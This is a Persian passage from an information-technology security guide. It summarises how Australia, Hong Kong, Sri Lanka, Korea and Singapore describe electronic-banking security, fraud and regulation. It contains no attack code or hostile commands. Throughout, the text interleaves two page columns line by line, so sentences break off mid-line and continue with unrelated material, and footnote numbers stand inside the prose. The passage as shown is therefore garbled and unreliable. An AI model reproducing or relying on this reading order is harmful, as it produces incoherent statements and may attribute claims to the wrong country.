‫ﺍﻳﺠﺎﺩ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬ ‫‪.۲‬‬ ‫ﻻ ﻣـﺴﺘﻨﺪﺍﺕ ﺩﺭ ﺩﺳـﺘﺮﺱ‪ ،‬ﺑـﺴﻴﺎﺭ‬ ‫ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻓﺰﺍﻳﺶ ﺷﻔﺎﻓﻴﺖ ﺩﺭ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬ ‫‪.۳‬‬ ‫ﻣﺤﺪﻭﺩ ﻫﺴﺘﻨﺪ‪ .‬ﻧﻤﺎﻳﻨﺪﺓ ﺍﺳﺘﺮﺍﻟﻴﺎ ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﺩﺭ‬
‫ﺍﻳﻦ ﻛﺸﻮﺭ ﻣﻄﺎﻟﺐ ﺁﻣﻮﺯﺷﻲ ﺭﺍﻳﮕﺎﻥ ﺩﺭ ﺯﻣﻴﻨـﻪﻫـﺎﻱ ﻋﻤـﻮﻣﻲ ﻭ‬
‫ﭼﻴﻦ‪ ،‬ﻫﻨﮓﻛﻨﮓ‬ ‫ﺗﺨﺼﺼﻲ ﺑﺮﺍﻱ ‪ download‬ﻛﺮﺩﻥ ﻓﺮﺍﻫﻢ ﺍﺳﺖ‪.‬‬
‫ﺩﺭ ﻫﻨﮓﻛﻨﮓ‪ ،‬ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻌﻠﻲ‪ ،‬ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻭ ﻛﺮﻣﻬﺎ‬
‫ﺍﺳﺘﺮﺍﻟﻴﺎ ﺳﻪ ﻧﻜﺘﻪ ﺍﺳﺎﺳﻲ ﺭﺍ ﻣﻄﺮﺡ ﻛﺮﺩ‪.‬‬
‫ﺑﺴﻴﺎﺭ ﺭﺍﻳﺞ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻛﻨﺎﺭ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻧﺤﻮﺓ ﺭﻓﺘـﺎﺭ ﻣﻬـﺎﺟﻤﻴﻦ‬
‫ﺍﻭﻝ‪ ،‬ﺗــﺎ ﺍﻛﺘﺒــﺮ ‪ ۲۰۰۳‬ﺩﺭ ﺗﻤــﺎﻣﻲ ﻛــﺸﻮﺭﻫﺎﻱ ﻋــﻀﻮ ‪APEC‬‬
‫ﻫﻢ ﺩﭼﺎﺭ ﺗﻐﻴﻴﺮ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﻛـﺸﻮﺭ ﺑﺠـﺎﻱ ﻫـﺪﻑ ﻗـﺮﺍﺭ‬
‫ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﻗﻮﺍﻧﻴﻨﻲ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ؛ ﻛﻪ ﻣﻮﺍﺭﺩﻱ‬
‫ﮔﺮﻓﺘﻦ ﻣﺴﺘﻘﻴﻢ ﺑﺎﻧﻜﻬﺎ‪ ،‬ﺿﻌﻴﻔﺘﺮﻳﻦ ﺣﻠﻘـﻪ ‪ -‬ﻳﻌﻨـﻲ ﻣـﺸﺘﺮﻱ ‪-‬‬
‫ﭼﻮﻥ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻋﻤـﺎﻝ ﻗـﻮﺍﻧﻴﻦ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ ﻭ ﻟـﺬﺍ ﺁﻣـﻮﺯﺵ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﺴﻴﺎﺭ‬
‫ﺑﺼﻮﺭﺕ ﻓﺮﺍﺑﺨﺸﻲ ﻭ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪.‬‬
‫ﺩﻭﻡ‪ ،‬ﺁﻣــﻮﺯﺵ ﻭ ﻫﻤﻜــﺎﺭﻱ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﺟــﺮﺍﻱ ﻗــﺎﻧﻮﻥ ﺩﺭ ﻫﻤــﺔ‬
‫ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﺍﺧﻴﺮﹰﺍ ﺩﺭ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺘﻌﻠﻖ ﺑﻪ ﻳﻚ ﺑﺎﻧﻚ ﺟﻌﻠﻲ‬ ‫ﺳﻄﻮﺡ ﻻﺯﻡ ﺍﺳﺖ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺑـﺼﻮﺭﺕ‬
‫ﺭﻭﻱ ﺩﺍﺩ‪ ،‬ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘـﻲ ﺭﺍ ﺁﺷـﻜﺎﺭﺗﺮ ﻛـﺮﺩ‪ .‬ﺍﻳـﻦ ﺑﺎﻧـﻚ ﺩﺭ‬ ‫ﺧﻼﺻﻪ ﺩﺭ ﺍﻳﻦ ﺩﻭﺭﻩﻫﺎ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ‪ .‬ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ‪ ،‬ﻳﻚ ﺁﺩﺭﺱ ﭘﺴﺘﻲ ﻧﺎﻗﺺ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺑﻮﺩ ﻭ ﺍﺯ ﮔﻮﺍﻫﻲ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٢٦‬‬

‫ﻛﺮﻩ ﺁﻣﺎﺭﻱ ﺍﺭﺍﺋﻪ ﻛﺮﺩ ﻛﻪ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺳﻄﺢ ﭘﺎﻳﻴﻦ ﺁﮔﺎﻫﻲ ﺍﻓـﺮﺍﺩ ﺩﺭ‬ ‫ﺩﻳﺠﻴﺘﺎﻝ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲ ﻛﺮﺩ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﺍﺩﻋـﺎ ﺩﺍﺷـﺖ ﻛـﻪ‬
‫ﺧﺼﻮﺹ ﺍﻳﻤﻨـﻲ ﺳﻴـﺴﺘﻢ ﺑـﻮﺩ‪ .‬ﺑـﻪ ﮔﻔﺘـﺔ ﻭﺯﺍﺭﺕ ﺍﻃﻼﻋـﺎﺕ ﻭ‬ ‫ﺩﻓﺎﺗﺮﻱ ﺩﺭ ﻧﻴﻮﻳﻮﺭﻙ ﻭ ﻧﻘﺎﻁ ﺩﻳﮕﺮ ﺩﺍﺭﺩ؛ ﺍﻣﺎ ﺩﺭ ﺑﺎﺯﺭﺳﻴﻬﺎ ﻣﻌﻠـﻮﻡ‬
‫ﺍﺭﺗﺒﺎﻃﺎﺕ‪ ،‬ﺗﻨﻬﺎ ‪ %۱۲،۹‬ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪%۱۶،۷ ،‬‬ ‫ﺷﺪ ﻛﻪ ﻫﻢ ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ )ﻛـﻪ ﺩﺭ ﭼـﻴﻦ ﻣﻴﺰﺑـﺎﻧﻲ ﻣـﻲﺷـﺪ( ﻭ ﻫـﻢ‬
‫ﻣﺆﺳﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ‪ ،‬ﻭ ‪ %۹،۲‬ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻳﮕـﺮ ﺩﺍﺭﺍﻱ ﺑﺨـﺸﻲ‬ ‫ﺑﺎﻧﻚ ﻣﻮﺭﺩ ﺍﺩﻋﺎ ﺟﻌﻠﻲ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﻭﺍﻗﻌﻪ ﺑﺎﺭ ﺩﻳﮕﺮ ﻧﻴﺎﺯ ﺣﻴـﺎﺗﻲ‬
‫ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ ﻫـﺴﺘﻨﺪ‪ .‬ﻛـﺮﻩ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﺍﻣﻨﻴـﺖ‬ ‫ﺑﻪ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﻓﺮﺍﺑﺨﺸﻲ ﺭﺍ ﺁﺷﻜﺎﺭ ﻛـﺮﺩ‪ ،‬ﺑﺨـﺼﻮﺹ ﺑـﻪ ﺍﻳـﻦ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﺩﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻫﺰﻳﻨﺔ ﻣﺒﻬﻢ‬ ‫ﺩﻟﻴﻞ ﻛﻪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ‪ ،‬ﺧﻮﺩ ﺑﺼﻮﺭﺕ ﻓﺮﺍﺑﺨﺸﻲ ﻋﻤـﻞ‬
‫ﺍﺳﺖ ﻛﻪ ﺗﻨﻬﺎ ﺑـﺎ ﺗﺨـﺼﻴﺺ ﻣﻨـﺎﺑﻊ ﻭ ﺯﻣـﺎﻥ ﻛـﺎﻓﻲ ﺑـﻪ ﺍﻧﺠـﺎﻡ‬ ‫ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻣﻲﺭﺳﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺗﻨﻬﺎ ﺣـﺪﻭﺩ ‪ %۱۲،۹‬ﺷـﺮﻛﺘﻬﺎﻱ ﺗﺠـﺎﺭﺕ‬ ‫ﻛﺸﻮﺭ ﻫﻨﮓﻛﻨﮓ ﺩﺭﺣﺎﻝ ﺗﻬﻴﺔ ﻣﻘﺪﻣﺎﺗﻲ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺑﺴﺘﺮﻫﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ‪ %۶،۱‬ﺗﻤﺎﻡ ﺷﺮﻛﺘﻬﺎ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ‬ ‫ﻧﻈﺎﺭﺕ ﺑﺮ ﻣـﺸﺘﺮﻳﺎﻥ ﻭ ﺁﻣـﻮﺯﺵ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺳـﺖ‪ ،‬ﻣﺜـﻞ ﺍﻧﺘـﺸﺎﺭ‬
‫ﺍﺯ ﺧﻮﺩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪.‬‬ ‫ﺭﺍﻫﻨﻤﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺍﻓـﺰﺍﻳﺶ ﺁﮔـﺎﻫﻲ ﻋﻤـﻮﻣﻲ ﺩﺭ ﺍﺑﻌـﺎﺩ ﺣﻴـﺎﺗﻲ‬
‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻋﻼﻥ ﻫﺸﺪﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺟـﺮﺍﺋﻢ‬
‫ﺳﺮﻳﻼﻧﻜﺎ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ‪ .‬ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﺮ ﻧﻈﺎﺭﺕ ﺩﺭ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺍﻳـﻦ‬
‫ﻧﻤﺎﻳﻨﺪﺓ ﺳﺮﻳﻼﻧﻜﺎ ﺑﻴﺎﻥ ﺩﺍﺷـﺖ ﻛـﻪ ﺩﺭ ﺁﻥ ﻛـﺸﻮﺭ ﺗﻬﺪﻳـﺪﻫﺎﻳﻲ‬ ‫ﻛﺸﻮﺭ ﺑﺎ ﺛﺒﺖﻛﻨﻨﺪﮔﺎﻥ ﺩﺍﻣﻨﻪ‪ ٢٤٠‬ﺭﺍﺑﻄـﺔ ﻧﺰﺩﻳﻜـﻲ ﺩﺍﺭﺩ ﻭ ﺑـﺮﺍﻱ‬
‫ﻣﺜﻞ ﻛﺮﻣﻬﺎ ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻣـﺎ ﻣﻘﺎﻣـﺎﺕ‬ ‫ﻛﻨﺘﺮﻝ ﻧﺎﻣﻬﺎﻱ ﺩﺍﻣﻨﺔ ﻣﺤﻠﻲ )‪ (.hk‬ﺍﺯ ﻓﺮﺁﻳﻨﺪﻱ ﺧﻮﺩﻛﺎﺭ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺳﺮﻳﻼﻧﻜﺎ ﺗﺎ ﻛﻨـﻮﻥ ﻫـﻴﭻ ﮔﺰﺍﺭﺷـﻲ ﺩﺭﺧـﺼﻮﺹ ﺣﻤـﻼﺕ ﺑـﻪ‬ ‫ﻣﻲ ﻛﻨﺪ‪ :‬ﺍﮔﺮ ﻭﺍﮊﺓ "ﺑﺎﻧﻚ" ﻳﺎ ﻫﺮ ﺷﻜﻞ ﺩﻳﮕـﺮ ﺁﻥ ﺩﺭ ﻧـﺎﻡ ﺩﺍﻣﻨـﻪ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻧﻜﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻛﺸﻮﺭ ﺣﺪﻭﺩ ‪ ۲۰‬ﺳﺎﻝ‬ ‫ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻣﻮﺿﻮﻉ ﺑﻼﻓﺎﺻـﻠﻪ ﺑـﺮﺍﻱ ﺑﺮﺭﺳـﻲ ﺑـﻪ ﻣﺮﺍﺟـﻊ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ‪ .‬ﻫﺮﭼﻨـﺪ‬ ‫ﺫﻳﺼﻼﺡ ﺍﺭﺟﺎﻉ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﻧﻴﺮﻭﻫﺎﻱ ﭘﻠﻴﺲ‪ ،‬ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ‬
‫ﺑﺎﻧﻜﺪﺍﺭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﺮﻳﻼﻧﻜﺎ ﺩﺭ ﺍﺑﺘﺪﺍﻱ ﺭﺍﻩ ﺍﺳﺖ ﺍﻣـﺎ ﺑـﻪ‬ ‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﻭ ﻧﻴﺰ ﺩﻭﻟـﺖ ﻫﻨـﮓﻛﻨـﮓ ﻫـﻢ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ‬
‫ﺳﺮﻋﺖ ﺩﺭﺣﺎﻝ ﺭﻭﺍﺝ ﻣﻲﺑﺎﺷـﺪ‪ .‬ﺗﺒـﺎﺩﻝ ﺳـﻬﺎﻡ ﻭ ﭘـﻮﻝ ﺑـﺼﻮﺭﺕ‬ ‫ﻗﺎﺑﻠﻴﺖ ﻭﺍﻛﻨﺶ ﺳﺮﻳﻊ ﺑﻪ ﺭﺧـﺪﺍﺩﻫﺎ‪ ،‬ﺑـﺎ ﻧﻬﺎﺩﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺩﺭ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﻗﺎﺑﻞ ﺍﻧﺠﺎﻡ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﻣﻜﺎﻧـﺎﺕ ﻧﻴـﺰ ﻫﻨـﻮﺯ ﺩﺭ‬ ‫ﺳــﻄﻮﺡ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ ﻫﻤﻜــﺎﺭﻱ ﺩﺍﺭﻧــﺪ‪ .‬ﺳﻴــﺴﺘﻢ ﻧﻈــﺎﺭﺕ ﺑــﺮ‬
‫ﻣﺮﺍﺣﻞ ﺍﻭﻟﻴﺔ ﺗﻮﺳﻌﺔ ﺧﻮﺩ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﺩﺭ ﺳـﺮﻳﻼﻧﻜﺎ‬ ‫ﺧﻮﺩﺍﺭﺯﻳﺎﺑﻲ )‪ ٢٤١(CSA‬ﺩﺭ ﭼﻴﺰﻱ ﺣﺪﻭﺩ ‪ ۷۰‬ﺗﺎ ‪ ۸۰‬ﺑﺎﻧـﻚ ﻭﺟـﻮﺩ‬
‫ﻣﻬﻤﺘﺮﻳﻦ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺳﺮﻗﺖ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ‬ ‫ﺩﺍﺭﺩ ﻭ ﺑﺪﻟﻴﻞ ﻣﺸﻜﻼﺕ ﺧﺎﺹ ﺍﺭﺯﻳﺎﺑﻲ ﺳﺎﻻﻧﻪ‪ ،‬ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻴـﺰ‬
‫ﻋﺒﻮﺭ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﻣﺆﺳﺴﺎﺕ ﺧـﺪﻣﺎﺕ ﻣـﺎﻟﻲ‪ ،‬ﺳـﻄﺢ ﺁﮔـﺎﻫﻲ ﺍﺯ‬ ‫ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﻳﻚ ﻣﺴﺌﻠﻪ ﻛﻠﻴﺪﻱ ﺍﺳﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﺨﺎﻃﺮﺍﺕ ﺑﺎﻳﺪ‬
‫ﺑﻪ ﺩﻗﺖ ﺍﺭﺯﻳﺎﺑﻲ ﺷﻮﻧﺪ‪.‬‬ ‫ﺟﻤﻬﻮﺭﻱ ﻛﺮﻩ‬
‫ﺑﺎ ﺍﻳﻨﻜﻪ ﻛﺮﻩ ﻧﺘﻮﺍﻧﺴﺖ ﺩﺭ ﺍﻳﻦ ﺑﺤﺚ ﺟﻬﺎﻧﻲ ﺷﺮﻛﺖ ﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺑـﻪ‬
‫ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺩﺭ ﺑﺨﺶ ﻣﺎﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ‬
‫ﺳﺆﺍﻻﺕ ﻣﻄﺮﺡ ﺷﺪﻩ ﺗﻮﺳﻂ ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﭘﺎﺳﺦ ﺩﺍﺩ‪ .‬ﺁﻧﻬﺎ ﺍﺷـﺎﺭﻩ‬
‫ﺗﻮﻧﻲ ﭼﻮ‪ ٢٤٢‬ﻣﺪﻳﺮ ﻧﻈﺎﺭﺕ ﺑﺮ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨـﺎﻭﺭﻱ ﺩﺭ ﺍﺩﺍﺭﺓ ﺍﻣـﻮﺭ‬ ‫ﻛﺮﺩﻧﺪ ﻛﻪ ﺍﮔﺮﭼﻪ ﻛﺮﻩ ﺩﺍﺭﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﭘﻴـﺸﺮﻓﺘﻪﺍﻱ‬
‫ﭘﻮﻟﻲ ﺳﻨﮕﺎﭘﻮﺭ )‪ ٢٤٣(MAS‬ﻣﺮﻭﺭﻱ ﺍﺟﻤﺎﻟﻲ ﺑﺮ ﻣﻘـﺪﻣﺎﺕ ﺍﻣﻨﻴـﺖ‬ ‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺁﻧﻬﺎ ﻫﻨﻮﺯ ﺟﺎ ﺑـﺮﺍﻱ ﺍﺭﺗﻘـﺎ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﻛـﺮﻩ‬
‫ﺳﺎﻳﺒﺮ ﺩﺍﺷﺖ‪ .‬ﻭﻱ ﺑﺤﺚ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺑﻴﺎﻥ ﺍﻳﻦ ﻣﻄﻠـﺐ ﺁﻏـﺎﺯ ﻛـﺮﺩ‬ ‫‪ %۶۵‬ﻣﻌﺎﻣﻼﺕ ﺑﻮﺭﺱ ﺑﺼﻮﺭﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻧﺠﺎﻡ ﻣﻲ ﺷﻮﺩ ﻭ ﺣﺪﻭﺩ‬
‫ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺑﺨﺶ ﺍﻭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ "ﺑﻪ ﻣﺆﺳﺴﺎﺕ ﺁﮔﺎﻫﻲ ﺩﻫﺪ‪،‬‬ ‫‪ ۲۵‬ﻣﻴﻠﻴﻮﻥ ﻧﻔﺮ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨـﺪ‪ .‬ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﺧﻴـﺮ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﻫﺪ‪ ،‬ﻭ ﻳﺎ ﻧﺴﺒﺖ ﺑﻪ ﺁﻧﻬـﺎ ﺳـﺨﺘﮕﻴﺮﻱ‬ ‫ﻣﺜﻞ ﺁﺳـﻴﺒﻬﺎﻱ ﻛـﺮﻡ ‪ Slammer‬ﺩﺭ ﮊﺍﻧﻮﻳـﺔ ‪ ۲۰۰۳‬ﺗـﺄﺛﻴﺮﺍﺕ‬
‫ﻧﻤﺎﻳﺪ"‪ .‬ﺳﻨﮕﺎﭘﻮﺭ ﻣﻲﻛﻮﺷﺪ ﺗﺎ ﺑﻪ ﻳﻚ ﻛﺎﻧﻮﻥ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺧـﺪﻣﺎﺕ‬ ‫ﺷﺪﻳﺪﻱ ﺩﺭ ﻛﺮﻩ ﺩﺍﺷﺖ ﻭ ﻃﺒﻴﻌﺖ ﺷﻜﻨﻨﺪﺓ ﺷـﺒﻜﻪﻫـﺎ ﺭﺍ ﺁﺷـﻜﺎﺭ‬
‫ﻣﺎﻟﻲ ﺗﺒﺪﻳﻞ ﺷﻮﺩ ﻭ ﺑﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﻣﻮﺿـﻮﻉ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬ ‫ﻛﺮﺩ‪.‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﺁﻥ ﺍﺯ ﺍﻫﻤﻴﺖ ﺧﺎﺻﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪.‬‬

‫‪242 Tony Chew‬‬ ‫‪240 Domain Registrar‬‬


‫‪243 Monetary Authority of Singapore‬‬ ‫‪241 Supervisory Control Self-Assessment‬‬
‫‪٢٢٧‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺗﻀﻤﻴﻦ ﺷﻮﺩ‪ .‬ﺑﺮﺍﻱ ‪PIN‬ﻫﺎ ﻧﻴﺰ ﺑﺎﻳﺪ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻗﻮﻱ ﺍﺳﺘﻔﺎﺩﻩ‬ ‫ﺑﺰﺭﮔﺘﺮﻳﻦ ﺑﺎﻧﻜﻬﺎﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺩﺭ ﺳﺎﻟﻬﺎﻱ ‪ ۲۰۰۱‬ﻭ ‪ ۲۰۰۲‬ﺗﻮﺳﻂ‬
‫ﺷﻮﺩ؛ ﺍﻣﺎ ﺍﻳﻦ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ ،‬ﭼـﻮﻥ ‪PIN‬ﻫـﺎ ﻛﻮﭼـﻚ‬ ‫ﻧﻔﻮﺫﮔﺮﺍﻥ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ؛ ﻛﻪ ﺍﻳﻦ ﺍﻣﺮ ﻧﺸﺎﻧﺪﻫﻨﺪﺓ ﻧﻴـﺎﺯ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ‪.‬‬ ‫ﻓﻮﺭﻱ ﺍﻳﻦ ﻛﺸﻮﺭ ﺑـﻪ ﺭﺍﻫﺒﺮﺩﻫـﺎﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﺑﺰﺭﮔﺘﺮﻳﻦ ﺑﺎﻧﻚ ﺳﻨﮕﺎﭘﻮﺭ )‪ (UOB‬ﻭﺟـﻮﺩ‬
‫ﺍﺩﺍﺭﺓ ﺍﻣــﻮﺭ ﭘــﻮﻟﻲ ﺳــﻨﮕﺎﭘﻮﺭ ﺑــﺮﺍﻱ ﻣﺆﺳــﺴﺎﺕ ﺧــﺪﻣﺎﺕ ﻣــﺎﻟﻲ‬
‫ﻳﻚ ﻧﻔﻮﺫﮔﺮ ﺭﺍ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺑﺎﻧﻜﺪﺍﺭﻱ ﺧﻮﺩ ﻛﺸﻒ ﻛـﺮﺩ‪.‬‬
‫"ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ" ﺷﺎﻣﻞ ‪ ۲۶‬ﺗﻮﺻـﻴﻪ ﺩﺭ‬
‫ﺑﺎ ﺍﻳﻨﻜﻪ ﺑﻴﺸﺘﺮ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﺎﻗﻲ‬
‫ﺯﻣﻴﻨﺔ ﺍﻳﺠﺎﺩ ﺍﻣﻨﻴﺖ ﻻﻳﻪﺍﻱ ﺗﺪﻭﻳﻦ ﻛﺮﺩ‪ .‬ﺳﻪ ﺩﺳﺘﺔ ﺍﺻـﻠﻲ ﺍﻳـﻦ‬
